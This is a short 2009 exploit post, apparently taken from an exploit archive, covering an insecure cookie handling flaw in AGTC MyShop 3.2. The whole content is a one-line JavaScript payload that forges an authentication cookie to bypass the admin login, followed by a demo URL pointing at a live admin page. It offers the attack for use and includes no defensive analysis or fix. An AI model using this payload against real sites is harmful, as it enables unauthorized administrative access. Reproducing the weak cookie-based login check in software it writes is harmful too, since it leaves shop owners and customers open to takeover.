id: 5128
date: 05/03/2009
title: AGTC MyShop 3.2 Insecure Cookie Handling Vulnerability
author: Mr.tro0oqy
cves: 

======================================================
AGTC MyShop 3.2 Insecure Cookie Handling Vulnerability
======================================================


=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script : AGTC MyShop v3.2b
[+] Found by : Mr.tro0oqy  
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
Exploit:
--------
javascript:document.cookie="log_accept=correcto;path=/";

Demo :
------
http://www.websiteforsaleuk.co.uk/demo/admin.php




#  0day.today [2023-03-21]  #